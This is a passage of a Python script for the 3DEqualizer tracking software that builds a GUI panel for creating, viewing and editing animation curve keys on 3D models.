tde4.createCurveKey(alpha_curves_list[item],[frame,alpha_v[3]])\r\n\t\ttde4.setCurveKeyFixedXFlag(alpha_curves_list[item],key,1)\r\n\t\ttde4.setCurveKeyMode(alpha_curves_list[item],key,\"LINEAR\")\r\n\telse:\r\n\t\ttde4.postQuestionRequester(window_title,\"Error, exactly one item must be selected.\",\"Ok\")\r\n\r\n\r\ndef Anim_Main_Callback(req,widget,action):\r\n\tpg = 
tde4.getCurrentPGroup()\r\n\tcam = tde4.getCurrentCamera()\r\n\tpg_type = tde4.getPGroupType(pg)\r\n\tframe = tde4.getCurrentFrame(cam)\r\n\tframes = tde4.getCameraNoFrames(tde4.getCurrentCamera())\r\n\tmlist = tde4.get3DModelList(pg,1)\r\n\r\n\tif widget == \"create_update_anim_curves_btn\":\r\n\t\tCreate_Keys(pg,cam,mlist,frame)\r\n\r\n\tif widget == \"model_list\":\r\n\t\ttde4.detachCurveAreaWidgetAllCurves(anim_req,\"curves_area\")\r\n\t\tno_of_items = tde4.getListWidgetNoItems(anim_req,\"model_list\")\r\n\t\tfor item in range(0,no_of_items):\r\n\t\t\ttde4.removeAllListWidgetItems(anim_req,\"curves_list\")\r\n\t\t\tsel_flag = tde4.getListWidgetItemSelectionFlag(anim_req,\"model_list\",item)\r\n\t\t\tif sel_flag == 1:\r\n\t\t\t\tlabel = tde4.getListWidgetItemLabel(anim_req,\"model_list\",item)\r\n\t\t\t\tlabel = str(label) + \" \" + str(\"Curves :\")\r\n\t\t\t\ttde4.insertListWidgetItem(anim_req,\"curves_list\",label,0)\t\r\n\t\t\t\ttde4.insertListWidgetItem(anim_req,\"curves_list\",\" \",1)\t\t\t\r\n\t\t\t\ttde4.insertListWidgetItem(anim_req,\"curves_list\",\"Position X\",2)\r\n\t\t\t\ttde4.insertListWidgetItem(anim_req,\"curves_list\",\"Position Y\",3)\r\n\t\t\t\ttde4.insertListWidgetItem(anim_req,\"curves_list\",\"Position Z\",4)\r\n\t\t\t\ttde4.insertListWidgetItem(anim_req,\"curves_list\",\"Rotation X\",5)\r\n\t\t\t\ttde4.insertListWidgetItem(anim_req,\"curves_list\",\"Rotation Y\",6)\r\n\t\t\t\ttde4.insertListWidgetItem(anim_req,\"curves_list\",\"Rotation Z\",7)\r\n\t\t\t\ttde4.insertListWidgetItem(anim_req,\"curves_list\",\"Uniform Scale\",8)\r\n\t\t\t\ttde4.insertListWidgetItem(anim_req,\"curves_list\",\"Visibility\",9)\r\n\t\t\t\ttde4.insertListWidgetItem(anim_req,\"curves_list\",\"Alpha\",10)\r\n\t\t\t\tbreak\r\n\r\n\t\ttde4.detachCurveAreaWidgetAllCurves(anim_req,\"curves_area\")\r\n\t\ttde4.attachCurveAreaWidgetCurve(anim_req,\"curves_area\",pos_x_curves_list[item],1.0,0.4,0.4,1)\r\n\t\ttde4.setCurveAreaWidgetXOffset(anim_req,\"curves_area\",frame_offset-1)\r\n\r\n\r\n\tif widget == \"curves_list\":\r\n\t\tcount = 0\r\n\t\tno_of_items = tde4.getListWidgetNoItems(anim_req,\"model_list\")\r\n\t\tfor item in range(0,no_of_items):\r\n\t\t\tsel_flag = tde4.getListWidgetItemSelectionFlag(anim_req,\"model_list\",item)\r\n\t\t\tif sel_flag == 1:\r\n\t\t\t\tbreak\r\n\t\t\tcount = count + 1\r\n\r\n\t\ttde4.detachCurveAreaWidgetAllCurves(anim_req,\"curves_area\")\t\t\r\n\t\tif tde4.getListWidgetItemSelectionFlag(anim_req,\"curves_list\",2):\r\n\t\t\tcurve = pos_x_curves_list[count]\r\n\t\t\tkeylist = tde4.getCurveKeyList(curve,0)\r\n\t\t\tif len(keylist) >= 1:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(anim_req,\"curves_area\",curve,1.0,0.0,0.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(anim_req,\"curves_area\",1,frames,Min_Max(keylist,curve)[2]-0.1,Min_Max(keylist,curve)[3]+0.1)\r\n\t\t\telse:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(anim_req,\"curves_area\",curve,1.0,0.0,0.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(anim_req,\"curves_area\",1.0,frames,-0.2,1.0)\t\t\r\n\r\n\t\tif tde4.getListWidgetItemSelectionFlag(req,\"curves_list\",3):\r\n\t\t\tcurve = pos_y_curves_list[count]\r\n\t\t\tkeylist = tde4.getCurveKeyList(curve,0)\r\n\t\t\tif len(keylist) >= 
1:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(anim_req,\"curves_area\",curve,0.0,1.0,0.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(anim_req,\"curves_area\",1,frames,Min_Max(keylist,curve)[2]-0.1,Min_Max(keylist,curve)[3]+0.1)\r\n\t\t\telse:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(anim_req,\"curves_area\",curve,0.0,1.0,0.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(anim_req,\"curves_area\",1.0,frames,-0.2,1.0)\t\r\n\r\n\t\tif tde4.getListWidgetItemSelectionFlag(anim_req,\"curves_list\",4):\r\n\t\t\tcurve = pos_z_curves_list[count]\r\n\t\t\tkeylist = tde4.getCurveKeyList(curve,0)\r\n\t\t\tif len(keylist) >= 1:\t\t\t\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(anim_req,\"curves_area\",curve,0.0,0.0,1.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(anim_req,\"curves_area\",1,frames,Min_Max(keylist,curve)[2]-0.1,Min_Max(keylist,curve)[3]+0.1)\r\n\t\t\telse:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(anim_req,\"curves_area\",curve,0.0,0.0,1.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(anim_req,\"curves_area\",1.0,frames,-0.2,1.0)\r\n\r\n\t\tif tde4.getListWidgetItemSelectionFlag(anim_req,\"curves_list\",5):\r\n\t\t\tcurve = rot_x_curves_list[count]\r\n\t\t\tkeylist = tde4.getCurveKeyList(curve,0)\r\n\t\t\tif len(keylist) >= 1:\t\t\t\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(anim_req,\"curves_area\",curve,0.0,1.0,1.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(anim_req,\"curves_area\",1,frames,Min_Max(keylist,curve)[2]-0.1,Min_Max(keylist,curve)[3]+0.1)\r\n\t\t\telse:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(anim_req,\"curves_area\",curve,0.0,1.0,1.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(anim_req,\"curves_area\",1.0,frames,-0.2,1.0)\r\n\r\n\t\tif tde4.getListWidgetItemSelectionFlag(anim_req,\"curves_list\",6):\r\n\t\t\tcurve = rot_y_curves_list[count]\r\n\t\t\tkeylist = tde4.getCurveKeyList(curve,0)\r\n\t\t\tif len(keylist) >= 1:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(anim_req,\"curves_area\",curve,1.0,0.0,1.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(anim_req,\"curves_area\",1,frames,Min_Max(keylist,curve)[2]-0.1,Min_Max(keylist,curve)[3]+0.1)\r\n\t\t\telse:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(anim_req,\"curves_area\",curve,1.0,0.0,1.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(anim_req,\"curves_area\",1.0,frames,-0.2,1.0)\t\t\t\t\t\r\n\r\n\t\tif tde4.getListWidgetItemSelectionFlag(anim_req,\"curves_list\",7):\r\n\t\t\tcurve = rot_z_curves_list[count]\r\n\t\t\tkeylist = tde4.getCurveKeyList(curve,0)\r\n\t\t\tif len(keylist) >= 1:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(anim_req,\"curves_area\",curve,1.0,1.0,0.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(anim_req,\"curves_area\",1,frames,Min_Max(keylist,curve)[2]-0.1,Min_Max(keylist,curve)[3]+0.1)\r\n\t\t\telse:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(anim_req,\"curves_area\",curve,1.0,1.0,0.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(anim_req,\"curves_area\",1.0,frames,-0.2,1.0)\r\n\r\n\t\tif tde4.getListWidgetItemSelectionFlag(req,\"curves_list\",8):\r\n\t\t\tcurve = scale_curves_list[count]\r\n\t\t\tkeylist = tde4.getCurveKeyList(curve,0)\r\n\t\t\tif len(keylist) >= 
1:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(req,\"curves_area\",curve,1.0,0.3,0.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(req,\"curves_area\",1,frames,Min_Max(keylist,curve)[2]-0.1,Min_Max(keylist,curve)[3]+0.1)\r\n\t\t\telse:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(req,\"curves_area\",curve,1.0,0.3,0.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(req,\"curves_area\",1.0,frames,-0.2,1.0)\r\n\r\n\t\tif tde4.getListWidgetItemSelectionFlag(req,\"curves_list\",9):\r\n\t\t\tcurve = visibility_curves_list[count]\r\n\t\t\tkeylist = tde4.getCurveKeyList(curve,0)\r\n\t\t\tif len(keylist) >= 1:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(req,\"curves_area\",curve,1.0,1.0,1.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(req,\"curves_area\",1,frames,Min_Max(keylist,curve)[2]-0.1,Min_Max(keylist,curve)[3]+0.1)\r\n\t\t\telse:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(req,\"curves_area\",curve,1.0,1.0,1.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(req,\"curves_area\",1.0,frames,-0.2,1.0)\r\n\r\n\t\tif tde4.getListWidgetItemSelectionFlag(req,\"curves_list\",10):\r\n\t\t\tcurve = alpha_curves_list[count]\r\n\t\t\tkeylist = tde4.getCurveKeyList(curve,0)\r\n\t\t\tif len(keylist) >= 1:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(req,\"curves_area\",curve,0.0,1.0,0.5,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(req,\"curves_area\",1,frames,Min_Max(keylist,curve)[2]-0.1,Min_Max(keylist,curve)[3]+0.1)\r\n\t\t\telse:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(req,\"curves_area\",curve,0.0,1.0,0.5,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(req,\"curves_area\",1.0,frames,-0.2,1.0)\r\n\r\n\tif widget == \"minus\":\r\n\t\t#remove selected item curves data from curves list...\r\n\t\tcount = 0\r\n\t\tno_of_items = tde4.getListWidgetNoItems(anim_req,\"model_list\")\r\n\t\tfor item in range(0,no_of_items):\r\n\t\t\tsel_flag = tde4.getListWidgetItemSelectionFlag(anim_req,\"model_list\",item)\r\n\t\t\tif sel_flag == 1:\r\n\t\t\t\tbreak\r\n\t\t\tcount = count + 1\r\n\t\ttry:\t\r\n\t\t\tdel pos_x_curves_list[count]\r\n\t\t\tdel pos_y_curves_list[count]\r\n\t\t\tdel pos_z_curves_list[count]\r\n\t\t\tdel rot_x_curves_list[count]\r\n\t\t\tdel rot_y_curves_list[count]\r\n\t\t\tdel rot_z_curves_list[count]\r\n\t\t\tdel scale_curves_list[count]\r\n\t\t\tdel visibility_curves_list[count]\r\n\t\t\tdel alpha_curves_list[count]\r\n\t\t\t#remove selected item from the model list...\r\n\t\t\tfor item in range(0,no_of_items):\r\n\t\t\t\tsel_flag = tde4.getListWidgetItemSelectionFlag(anim_req,\"model_list\",item)\r\n\t\t\t\tif sel_flag == 1:\r\n\t\t\t\t\ttde4.removeListWidgetItem(anim_req,\"model_list\",item)\r\n\t\t\t\t\ttde4.removeAllListWidgetItems(anim_req,\"curves_list\")\r\n\t\t\t\t\tbreak\r\n\t\t\ttde4.detachCurveAreaWidgetAllCurves(anim_req,\"curves_area\")\r\n\t\texcept:\r\n\t\t\tpass\t\t\r\n\r\n\tif widget == \"plus\":\r\n\t\tif len(mlist) == 1:\r\n\t\t\tc = 0\r\n\t\t\tm_name = tde4.get3DModelName(pg,mlist[0])\r\n\t\t\tno_of_items = tde4.getListWidgetNoItems(anim_req,\"model_list\")\r\n\t\t\tfor item in range(0,no_of_items):\r\n\t\t\t\tlabel = tde4.getListWidgetItemLabel(anim_req,\"model_list\",item)\r\n\t\t\t\tif m_name != label:\r\n\t\t\t\t\tc = 1\r\n\t\t\t\telse:\r\n\t\t\t\t\tc = 0\r\n\t\t\t\t\tbreak\t\t\t\t\t\r\n\t\t\tif c == 1:\r\n\t\t\t\t#append position curves...\r\n\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\tpos_x_curves_list.append(curve_id)\r\n\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\tpos_y_curves_list.append(curve_id)\r\n\t\t\t\tcurve_id = 
tde4.createCurve()\r\n\t\t\t\tpos_z_curves_list.append(curve_id)\r\n\t\t\t\t#append rotation curves...\r\n\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\trot_x_curves_list.append(curve_id)\r\n\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\trot_y_curves_list.append(curve_id)\r\n\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\trot_z_curves_list.append(curve_id)\r\n\t\t\t\t#append scale curves...\r\n\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\tscale_curves_list.append(curve_id)\r\n\t\t\t\t#append visibility curves...\r\n\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\tvisibility_curves_list.append(curve_id)\t\r\n\t\t\t\t#append alpha curves...\r\n\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\talpha_curves_list.append(curve_id)\r\n\t\t\t\t#add 3DModel name to list widget...\r\n\t\t\t\ttde4.insertListWidgetItem(anim_req,\"model_list\",m_name)\r\n\t\telse:\r\n\t\t\ttde4.postQuestionRequester(window_title,\"Error, exactly one 3DModel must be selected.\",\"Ok\")\r\n\r\n\tif widget == \"view_all\" or widget == \"view_all_menu_widget\":\r\n\t\ty = []\r\n\t\tcurves_list = tde4.getCurveAreaWidgetCurveList(anim_req,\"curves_area\")\r\n\t\tfor curve in curves_list:\r\n\t\t\tkeylist = tde4.getCurveKeyList(curve,0)\r\n\t\t\tfor key in keylist:\r\n\t\t\t\tpos_2d = tde4.getCurveKeyPosition(curve,key)\r\n\t\t\t\ty.append(pos_2d[1])\r\n\t\tif len(y) > 0:\r\n\t\t\ttde4.setCurveAreaWidgetDimensions(anim_req,\"curves_area\",1.0,frames,min(y)-0.1,max(y)+0.1)\r\n\t\telse:\r\n\t\t\ttde4.setCurveAreaWidgetDimensions(anim_req,\"curves_area\",1.0,frames,-0.2,1.0)\r\n\r\n\tif widget == \"key-\" or widget == \"key+\" or widget == \"jump_previous_key\" or widget == \"jump_next_key\":\r\n\t\tcurve_list = tde4.getCurveAreaWidgetCurveList(anim_req,\"curves_area\")\r\n\t\tcurve = curve_list[0]\r\n\t\tif widget == \"key+\" or widget == \"jump_next_key\":\r\n\t\t\t#find the closest key after the current frame...\r\n\t\t\tkeylist = tde4.getCurveKeyList(curve,0)\r\n\t\t\tf = 1000000\r\n\t\t\tfor key in keylist:\r\n\t\t\t\tpos = tde4.getCurveKeyPosition(curve,key)\r\n\t\t\t\tif int(pos[0])>frame and int(pos[0])<f:\r\n\t\t\t\t\tf = int(pos[0])\r\n\t\t\tif f != 1000000:\r\n\t\t\t\ttde4.setCurrentFrame(cam,f)\r\n\t\t\t\ttde4.setCurveAreaWidgetCursorPosition(anim_req,\"curves_area\",tde4.getCurrentFrame(cam))\r\n\t\tif widget == \"key-\" or widget == \"jump_previous_key\":\r\n\t\t\t#find the closest key before the current frame...\r\n\t\t\tkeylist = tde4.getCurveKeyList(curve,0)\r\n\t\t\tf = -1\r\n\t\t\tfor key in keylist:\r\n\t\t\t\tpos = tde4.getCurveKeyPosition(curve,key)\r\n\t\t\t\tif int(pos[0])<frame and int(pos[0])>f:\r\n\t\t\t\t\tf = int(pos[0])\r\n\t\t\tif f != -1:\r\n\t\t\t\ttde4.setCurrentFrame(cam,f)\r\n\t\t\t\ttde4.setCurveAreaWidgetCursorPosition(anim_req,\"curves_area\",tde4.getCurrentFrame(cam))\r\n\r\n\tif widget == \"delete_keys_btn\":\r\n\t\t#make sure only one item must be selected...\r\n\t\tcount = 0\r\n\t\tno_of_items = tde4.getListWidgetNoItems(anim_req,\"model_list\")\r\n\t\tfor item in range(0,no_of_items):\r\n\t\t\tsel_flag = tde4.getListWidgetItemSelectionFlag(anim_req,\"model_list\",item)\r\n\t\t\tif sel_flag == 1:\r\n\t\t\t\tcount = count + 1\r\n\r\n\t\tif count == 1:\r\n\t\t\tfor item in range(0,no_of_items):\r\n\t\t\t\tsel_flag = tde4.getListWidgetItemSelectionFlag(anim_req,\"model_list\",item)\r\n\t\t\t\tif sel_flag == 1:\r\n\t\t\t\t\tbreak\r\n\t\t\ttde4.deleteAllCurveKeys(pos_x_curves_list[item])\t\t\t\r\n\t\t\ttde4.deleteAllCurveKeys(pos_y_curves_list[item])\r\n\t\t\ttde4.deleteAllCurveKeys(pos_z_curves_list[item])\r\n\t\t\ttde4.deleteAllCurveKeys(rot_x_curves_list[item])\t\t\t\r\n\t\t\ttde4.deleteAllCurveKeys(rot_y_curves_list[item])\t\t\t\r\n\t\t\ttde4.deleteAllCurveKeys(rot_z_curves_list[item])\t\t\t\r\n\t\t\ttde4.deleteAllCurveKeys(scale_curves_list[item])\t\t\t\r\n\t\t\ttde4.deleteAllCurveKeys(visibility_curves_list[item])\r\n\t\t\ttde4.deleteAllCurveKeys(alpha_curves_list[item])\r\n\t\telse:\r\n\t\t\ttde4.postQuestionRequester(window_title,\"Error, exactly one item must be selected.\",\"Ok\")\r\n\r\n\r\n\r\ndef 
Curvearea_Callback(req,widget,action):\r\n\tcam = tde4.getCurrentCamera()\r\n\tif action==3 or action==2:\r\n\t\tf = tde4.getCurveAreaWidgetCursorPosition(anim_req,\"curves_area\")\r\n\t\tn = tde4.getCameraNoFrames(cam)\r\n\t\tif f < 1: f = 1\r\n\t\tif f > n: f = 1\r\n\t\ttde4.setCurrentFrame(cam,int(f))\r\n\r\ndef Editmenu_Callback(req,widget,action):\r\n\tif widget == \"delete_cvs\":\r\n\t\tcurve_list = tde4.getCurveAreaWidgetCurveList(anim_req,\"curves_area\")\r\n\t\tfor curve in curve_list:\r\n\t\t\tkeylist = tde4.getCurveKeyList(curve,1)\r\n\t\t\tfor key in keylist:\r\n\t\t\t\ttde4.deleteCurveKey(curve,key)\r\n\t\t\ttde4.updateGUI(1)\r\n\r\n\tif widget == \"set_linear\" or widget == \"set_smooth\" or widget == \"set_broken\":\r\n\t\tmode = widget[4:10].upper()\r\n\t\tcurve_list = tde4.getCurveAreaWidgetCurveList(anim_req,\"curves_area\")\t\t\r\n\t\tfor curve in curve_list:\r\n\t\t\tkeylist = tde4.getCurveKeyList(curve,1)\r\n\t\t\tfor key in keylist:\r\n\t\t\t\ttde4.setCurveKeyMode(curve,key,mode)\r\n\t\t\t\tif mode!=\"LINEAR\":\r\n\t\t\t\t\tk0 = tde4.getPrevCurveKey(curve,key)\r\n\t\t\t\t\tk1 = tde4.getNextCurveKey(curve,key)\r\n\t\t\t\t\tif k0 != None and k1 != None:\r\n\t\t\t\t\t\tv0 = tde4.getCurveKeyPosition(curve,k0)\r\n\t\t\t\t\t\tv1 = tde4.getCurveKeyPosition(curve,k1)\r\n\t\t\t\t\t\ttx = (v0[0]-v1[0])/50.0\r\n\t\t\t\t\t\tty = (v0[1]-v1[1])/50.0\r\n\t\t\t\t\t\ttde4.setCurveKeyTangent1(curve,key,[tx,ty])\r\n\t\t\t\t\t\ttde4.setCurveKeyTangent2(curve,key,[-tx,-ty])\r\n\t\ttde4.updateGUI(1)\r\n\r\n\tif widget == \"flatten\":\r\n\t\tcurve_list = tde4.getCurveAreaWidgetCurveList(anim_req,\"curves_area\")\t\t\r\n\t\tfor curve in curve_list:\r\n\t\t\tkeylist = tde4.getCurveKeyList(curve,1)\r\n\t\t\tfor key in keylist:\r\n\t\t\t\tt = tde4.getCurveKeyTangent1(curve,key)\r\n\t\t\t\tt[1] = 0.0\r\n\t\t\t\ttde4.setCurveKeyTangent1(curve,key,t)\r\n\t\t\t\tt = tde4.getCurveKeyTangent2(curve,key)\r\n\t\t\t\tt[1] = 0.0\r\n\t\t\t\ttde4.setCurveKeyTangent2(curve,key,t)\r\n\t\ttde4.updateGUI(1)\r\n\r\n\tif widget == \"fix_cvs\" or widget == \"unfix_cvs\":\r\n\t\tif widget == \"fix_cvs\": flag = 1\r\n\t\telse: flag = 0\r\n\t\tcurve_list = tde4.getCurveAreaWidgetCurveList(anim_req,\"curves_area\")\t\t\r\n\t\tfor curve in curve_list:\r\n\t\t\tkeylist = tde4.getCurveKeyList(curve,1)\r\n\t\t\tfor key in keylist:\r\n\t\t\t\ttde4.setCurveKeyFixedXFlag(curve,key,flag)\r\n\t\ttde4.updateGUI(1)\r\n\r\n\r\ndef Min_Max(keylist,curve):\r\n\tkeylist = tde4.getCurveKeyList(curve,0)\r\n\tx = []\r\n\ty = []\r\n\tfor key in keylist:\r\n\t\tpos_2d = tde4.getCurveKeyPosition(curve,key)\r\n\t\tx.append(pos_2d[0])\r\n\t\ty.append(pos_2d[1])\r\n\treturn min(x),max(x),min(y),max(y)\r\n\r\n\r\nif pg_type == \"CAMERA\":\r\n\tif len(mlist) > 0:\r\n\t\tcount = 0\r\n\t\tfor model in mlist:\r\n\t\t\tsurvey_flag = tde4.get3DModelSurveyFlag(pg,model)\r\n\t\t\tif survey_flag == 1:\r\n\t\t\t\tcount = count + 1\r\n\t\tif count == 0:\r\n\t\t\ttry:\r\n\t\t\t\tanim_req\t= _anim_requester\r\n\t\t\texcept (ValueError,NameError,TypeError):\r\n\t\t\t\tanim_req\t= tde4.createCustomRequester()\r\n\t\t\t\t_anim_requester\t= anim_req\r\n\r\n\t\t\t\t#anim_req = tde4.createCustomRequester()\r\n\t\t\t\t#add menu bar widget...\r\n\t\t\t\ttde4.addMenuBarWidget(anim_req,\"menu_bar\")\r\n\t\t\t\ttde4.setWidgetAttachModes(anim_req,\"menu_bar\",\"ATTACH_WINDOW\",\"ATTACH_POSITION\",\"ATTACH_WINDOW\",\"ATTACH_NONE\")\r\n\t\t\t\ttde4.setWidgetOffsets(anim_req,\"menu_bar\",2,15,2,0)\r\n\r\n\t\t\t\t#add edit 
menu...\r\n\t\t\t\ttde4.addMenuWidget(anim_req,\"edit_menu\",\"Edit\",\"menu_bar\",0)\r\n\t\t\t\ttde4.addMenuButtonWidget(anim_req,\"delete_cvs\",\"Delete CVs\",\"edit_menu\")\r\n\t\t\t\ttde4.setWidgetShortcut(anim_req,\"delete_cvs\",8)\r\n\t\t\t\ttde4.addMenuSeparatorWidget(anim_req,\"sep1\",\"edit_menu\")\r\n\t\t\t\ttde4.addMenuWidget(anim_req,\"set_cvs_menu\",\"Set CVs To\",\"edit_menu\")\r\n\t\t\t\ttde4.addMenuButtonWidget(anim_req,\"set_linear\",\"Linear\",\"set_cvs_menu\")\r\n\t\t\t\ttde4.setWidgetShortcut(anim_req,\"set_linear\",108)\r\n\t\t\t\ttde4.addMenuButtonWidget(anim_req,\"set_smooth\",\"Smooth\",\"set_cvs_menu\")\r\n\t\t\t\ttde4.setWidgetShortcut(anim_req,\"set_smooth\",115)\r\n\t\t\t\ttde4.addMenuButtonWidget(anim_req,\"set_broken\",\"Broken\",\"set_cvs_menu\")\r\n\t\t\t\ttde4.setWidgetShortcut(anim_req,\"set_broken\",98)\r\n\t\t\t\ttde4.addMenuButtonWidget(anim_req,\"flatten\",\"Flatten Tangents\",\"edit_menu\")\r\n\t\t\t\ttde4.addMenuButtonWidget(anim_req,\"fix_cvs\",\"Fix CVs Vertically\",\"edit_menu\")\r\n\t\t\t\ttde4.addMenuButtonWidget(anim_req,\"unfix_cvs\",\"Unfix CVs Vertically\",\"edit_menu\")\r\n\t\t\t\ttde4.addMenuButtonWidget(anim_req,\"jump_previous_key\",\"Jump to Previous Key\",\"edit_menu\")\r\n\t\t\t\ttde4.setWidgetShortcut(anim_req,\"jump_previous_key\",3018)\r\n\t\t\t\ttde4.addMenuButtonWidget(anim_req,\"jump_next_key\",\"Jump to Next Key\",\"edit_menu\")\r\n\t\t\t\ttde4.setWidgetShortcut(anim_req,\"jump_next_key\",3019)\r\n\r\n\t\t\t\t#add view menu...\r\n\t\t\t\ttde4.addMenuWidget(anim_req,\"view_menu\",\"View\",\"menu_bar\",0)\r\n\t\t\t\ttde4.addMenuButtonWidget(anim_req,\"view_all_menu_widget\",\"View All\",\"view_menu\")\r\n\t\t\t\ttde4.setWidgetShortcut(anim_req,\"view_all_menu_widget\",32)\r\n\r\n\t\t\t\t#add curve are widget...\r\n\t\t\t\ttde4.addCurveAreaWidget(anim_req,\"curves_area\",\"\",100)\r\n\t\t\t\ttde4.setWidgetAttachModes(anim_req,\"curves_area\",\"ATTACH_WINDOW\",\"ATTACH_POSITION\",\"ATTACH_AS_IS\",\"ATTACH_WINDOW\")\r\n\t\t\t\ttde4.setWidgetOffsets(anim_req,\"curves_area\",5,82,-1000,30)\r\n\r\n\t\t\t\t#add live update toggle widget...\r\n\t\t\t\tlive_toggle = tde4.addToggleWidget(anim_req,\"live_update_toggle\",\"Viewport Realtime live update\",0)\r\n\t\t\t\ttde4.setWidgetAttachModes(anim_req,\"live_update_toggle\",\"ATTACH_POSITION\",\"ATTACH_POSITION\",\"ATTACH_WINDOW\",\"ATTACH_AS_IS\")\r\n\t\t\t\ttde4.setWidgetOffsets(anim_req,\"live_update_toggle\",55,57,2,0)\r\n\r\n\t\t\t\t#add 3DModels list widget...\r\n\t\t\t\ttde4.addListWidget(anim_req,\"model_list\",\"\",1,80)\r\n\t\t\t\ttde4.setWidgetLinks(anim_req,\"model_list\",\"curves_area\",\"\",\"curves_area\",\"curves_area\")\r\n\t\t\t\ttde4.setWidgetAttachModes(anim_req,\"model_list\",\"ATTACH_WIDGET\",\"ATTACH_WINDOW\",\"ATTACH_OPPOSITE_WIDGET\",\"ATTACH_WINDOW\")\r\n\t\t\t\ttde4.setWidgetOffsets(anim_req,\"model_list\",5,5,0,400)\t\r\n\r\n\t\t\t\t#add 3DModels button widget...\r\n\t\t\t\ttde4.addButtonWidget(anim_req,\"plus\",\"+\",70,10)\r\n\t\t\t\ttde4.setWidgetAttachModes(anim_req,\"plus\",\"ATTACH_POSITION\",\"ATTACH_POSITION\",\"ATTACH_WINDOW\",\"ATTACH_AS_IS\")\r\n\t\t\t\ttde4.setWidgetOffsets(anim_req,\"plus\",87,92,345,0)\r\n\r\n\t\t\t\t#subtract 3DModels button widget...\r\n\t\t\t\ttde4.addButtonWidget(anim_req,\"minus\",\"-\",70,10)\r\n\t\t\t\ttde4.setWidgetAttachModes(anim_req,\"minus\",\"ATTACH_POSITION\",\"ATTACH_POSITION\",\"ATTACH_WINDOW\",\"ATTACH_AS_IS\")\r\n\t\t\t\ttde4.setWidgetOffsets(anim_req,\"minus\",93,98,345,0)\r\n\r\n\t\t\t\t#add list 
widget...\r\n\t\t\t\ttde4.addListWidget(anim_req,\"curves_list\",\"\",1,80)\r\n\t\t\t\ttde4.setWidgetLinks(anim_req,\"curves_list\",\"curves_area\",\"\",\"curves_area\",\"curves_area\")\r\n\t\t\t\ttde4.setWidgetAttachModes(anim_req,\"curves_list\",\"ATTACH_WIDGET\",\"ATTACH_WINDOW\",\"ATTACH_OPPOSITE_WIDGET\",\"ATTACH_WINDOW\")\r\n\t\t\t\ttde4.setWidgetOffsets(anim_req,\"curves_list\",5,5,390,30)\r\n\r\n\t\t\t\t#add 3DModel name to model list widget...\r\n\t\t\t\tfor i in range(len(mlist)):\r\n\t\t\t\t\tname = tde4.get3DModelName(pg,mlist[i])\r\n\t\t\t\t\ttde4.insertListWidgetItem(anim_req,\"model_list\",str(name),i)\r\n\r\n\t\t\t\t#create/update animation curves button widget...\r\n\t\t\t\ttde4.addButtonWidget(anim_req,\"create_update_anim_curves_btn\",\"Create/Update Anim Curves Keys\",240,5)\r\n\t\t\t\ttde4.setWidgetLinks(anim_req,\"create_update_anim_curves_btn\",\"\",\"\",\"curves_area\",\"\")\r\n\r\n\t\t\t\t#delete all anim curves keys button widget...\r\n\t\t\t\ttde4.addButtonWidget(anim_req,\"delete_keys_btn\",\"Delete all Anim Curves Keys\",210,5)\r\n\t\t\t\ttde4.setWidgetLinks(anim_req,\"delete_keys_btn\",\"create_update_anim_curves_btn\",\"\",\"curves_area\",\"\")\r\n\t\t\t\ttde4.setWidgetOffsets(anim_req,\"delete_keys_btn\",260,0,5,0)\r\n\r\n\t\t\t\t#add key- button widget...\r\n\t\t\t\ttde4.addButtonWidget(anim_req,\"key-\",\"Previous Key\",90,5)\r\n\t\t\t\ttde4.setWidgetLinks(anim_req,\"key-\",\"create_update_anim_curves_btn\",\"\",\"curves_area\",\"\")\r\n\t\t\t\ttde4.setWidgetOffsets(anim_req,\"key-\",500,0,5,0)\r\n\r\n\t\t\t\t#add key+ button widget...\r\n\t\t\t\ttde4.addButtonWidget(anim_req,\"key+\",\"Next 